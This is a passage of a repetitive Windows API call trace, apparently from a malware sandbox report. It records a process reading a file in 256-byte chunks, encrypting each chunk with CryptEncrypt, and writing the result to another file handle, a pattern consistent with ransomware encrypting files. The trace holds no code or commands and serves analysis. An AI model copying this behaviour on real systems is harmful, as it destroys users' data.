lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.600] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.600] GetLastError () returned 0x0 [0143.600] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.600] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.600] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.600] GetLastError () returned 0x0 [0143.600] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.600] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.600] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.600] GetLastError () returned 0x0 [0143.600] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.600] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.600] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.600] GetLastError () returned 0x0 [0143.600] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.600] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.600] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.600] GetLastError () returned 0x0 [0143.600] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.600] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.600] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.600] GetLastError () returned 0x0 [0143.600] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.600] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.601] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.601] GetLastError () returned 0x0 [0143.601] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.601] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.601] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.601] GetLastError () returned 0x0 [0143.601] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.601] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.601] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.601] GetLastError () returned 0x0 [0143.601] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.601] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.601] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.601] GetLastError () returned 0x0 [0143.601] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.601] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.601] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.601] GetLastError () returned 0x0 [0143.601] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.601] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.601] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.601] GetLastError () returned 0x0 [0143.601] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.601] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.602] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.602] GetLastError () returned 0x0 [0143.602] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.602] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.602] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.602] GetLastError () returned 0x0 [0143.602] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.602] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.602] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.602] GetLastError () returned 0x0 [0143.602] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.602] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.602] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.602] GetLastError () returned 0x0 [0143.602] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.602] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.602] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.602] GetLastError () returned 0x0 [0143.602] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.602] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.602] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.602] GetLastError () returned 0x0 [0143.602] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.602] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.602] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.602] GetLastError () returned 0x0 [0143.602] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.603] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.603] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.603] GetLastError () returned 0x0 [0143.603] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.603] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.603] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.603] GetLastError () returned 0x0 [0143.603] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.603] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.603] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.603] GetLastError () returned 0x0 [0143.603] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.603] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.603] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.603] GetLastError () returned 0x0 [0143.603] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.603] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.603] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.603] GetLastError () returned 0x0 [0143.603] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.603] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.603] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.603] GetLastError () returned 0x0 [0143.603] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.603] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.603] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.603] GetLastError () returned 0x0 [0143.604] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.604] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.604] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.604] GetLastError () returned 0x0 [0143.604] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.604] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.604] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.604] GetLastError () returned 0x0 [0143.604] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.604] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.604] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.604] GetLastError () returned 0x0 [0143.604] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.604] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.604] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.604] GetLastError () returned 0x0 [0143.604] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.604] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.604] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.604] GetLastError () returned 0x0 [0143.604] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.604] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.604] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.604] GetLastError () returned 0x0 [0143.605] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.605] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.605] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, 